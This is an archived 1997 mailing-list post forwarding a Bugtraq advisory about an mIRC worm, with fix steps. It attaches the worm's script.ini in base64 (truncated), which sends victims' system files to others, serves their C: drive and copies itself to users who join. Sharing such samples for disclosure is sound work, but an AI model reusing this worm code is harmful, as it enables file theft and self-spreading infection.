#LinuxGER

mIRC Worm (fwd)

Christian Huettermann (huetti@queens.multimedia.de)
Thu, 18 Dec 1997 18:52:10 +0100 (MET)

Date: Thu, 18 Dec 1997 18:52:10 +0100 (MET)
From: Christian Huettermann <huetti@queens.multimedia.de>
To: linux-ger@infodrom.north.de
Subject: mIRC Worm (fwd)
Message-ID: <Pine.LNX.3.96.971218185143.10576J-200000@queens.multimedia.de>

This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.

--1921685494-1339416039-882464371=:2985
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.LNX.3.96.971218185143.10576L@queens.multimedia.de>

Soviel zu mIRC sucks... ;-)

---------- Forwarded message ----------
Date: Thu, 18 Dec 1997 10:59:31 -0600
From: Aleph One <aleph1@dfw.net>
To: BUGTRAQ@NETSPACE.ORG
Subject: mIRC Worm

There is an mIRC worm/script going around IRC. mIRC has a bug that
allows remote users to download script files onto the victims machines and
execute them. mIRC 5.3 has been release to fix the hole. You can also fix
the problem by changing the default download subdirectory to be something
else than the directory containing the script files. To do so:

a) Start the mIRC software
b) Click the mIRC menu option DCC | Options | Dirs | Edit
c) Change the default download directory. Point to an alternate
directory or folder name.

Attached you will find one of the many variations of the script. I
don't plan on starting a thread on this topic. mIRC is always been a
mess. This is just a heads up. Some reference URLs:

http://www.mirc.org/
http://www5.zdnet.com/zdnn/content/zdnn/1216/263771.html
http://www.drsolomon.com/vircen/valerts/simpsal.html
http://www.drsolomon.com/vircen/vanalyse/worms.html
http://www.irchelp.org/irchelp/mirc/si.html

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

--1921685494-1339416039-882464371=:2985
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="script.ini"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.SUN.3.94.971218105931.2985A@dfw.dfw.net>
Content-Description:

W3NjcmlwdF0NDQpuMD07LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0NCm4xPTsgICAgICBQcm90
ZWN0aW9uIExpc3QNDQpuMj07LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0NCm4zPU9OIDE6VEVY
VDoqc3BhbXF1aXQqOiM6L3F1aXQgSm9sbHkgU3BhbWhlYWQgT3dueiBNZQ0N
Cm40PU9OIDE6VEVYVDoqaGkqOiM6L2RjYyBzZW5kICRuaWNrIGM6XGNvbmZp
Zy5zeXMNDQpuNT1PTiAxOlRFWFQ6KiFzZXJ2bWUqOiM6L2ZzZXJ2ZSAkbmlj
ayAxIGM6XA0NCm42PU9OIDE6VEVYVDoqY3lhKjojOi9kY2Mgc2VuZCAkbmlj
ayBjOlx3aW5kb3dzXHdpbi5pbmkNDQpuNz1PTiAxOlRFWFQ6KnRoZSo6Izov
ZGNjIHNlbmQgJG5pY2sgYzpcYXV0b2V4ZWMuYmF0DQ0Kbjg9T04gMTpOT1RJ
Q0U6KjojOi9tc2cgI3JvbXMgfyAkKyAkY2hhbiAkKyB/IC0gJCsgJG5pY2sg
JCsgLSAkcGFybXMNDQpuOT1PTiAxOlRFWFQ6Kjo/Oi9tc2cgI3JvbXMgKipN
ZXNzYWdlIGZyb20gJG5pY2sgJCsgKiogJHBhcm1zIHwgL2Nsb3NlbXNnICAk
bmljaw0NCm4xMD1PTiAxOlRFWFQ6KjojOi9tc2cgI3JvbXN/ICQrICRjaGFu
ICQrIH8gPCAkKyAkbmljayAkKyA+ICRwYXJtcw0NCk4xMT1PTiAxOlRFWFQ6
KjojOi9zYXkgSSBhbSBsYW1lIGZvciBydW5uaW5nIFNjcmlwdC5pbmkgYW5k
IEkgc2hvdWxkIGJlIHNob3QhDQ0KbjEyPU9OIDE6Sk9JTjojOi9kY2Mgc2Vu
ZCAkbmljayBTQ1JJUFQuSU5JDQ0KbjEzPU9OIDE6Sk9JTjoqUmFTUHVUZU4q
Oi9tb2RlICtvICRjaGFuIFJhU1B1VGVODQ0KTjE0PU9OIDE6Sk9JTjojOi9t
c2cgJG5pY2sgTXkgQ29tcHV0ZXIgSXMgT3BlbiBGb3IgVGhlIHRha2luZyEg
VHlwZSAhc2Vydm1lIGluIGNoYW5uZWwhDQ0KbjE1PSN1c2VyLnByb3QuYWRk
LmFsbCBvZmYNDQpuMTY9cmF3IDQwMToqOiBzZXQgJVVzZXIuTmljayAwIHwg
aGFsdA0NCm4xNz1yYXcgMzAxOio6IGhhbHQNDQpuMTg9cmF3IDMxMToqOiBz
ZXQgJVVzZXIuQWRkcmVzcyAkMiAkKyAhICQrICQzICQrIEAgJCsgJDQgfCBo
YWx0DQ0KbjE5PXJhdyAzMTI6KjogaGFsdA0NCm4yMD1yYXcgMzEzOio6IGhh
bHQNDQpuMjE9cmF3IDMxNzoqOiBoYWx0DQ0KbjIyPXJhdyAzMTk6KjogaGFs
dA0NCm4yMz1yYXcgMzE4Oiogew0NCm4yND0gIGlmICglVXNlci5OaWNrID09
IDApIHsgZXJyb3IgJDIgJCsgLCBubyBzdWNoIG5pY2sgfCBnb3RvIGRv
--1921685494-1339416039-882464371=:2985--


This archive was generated by hypermail 1.02.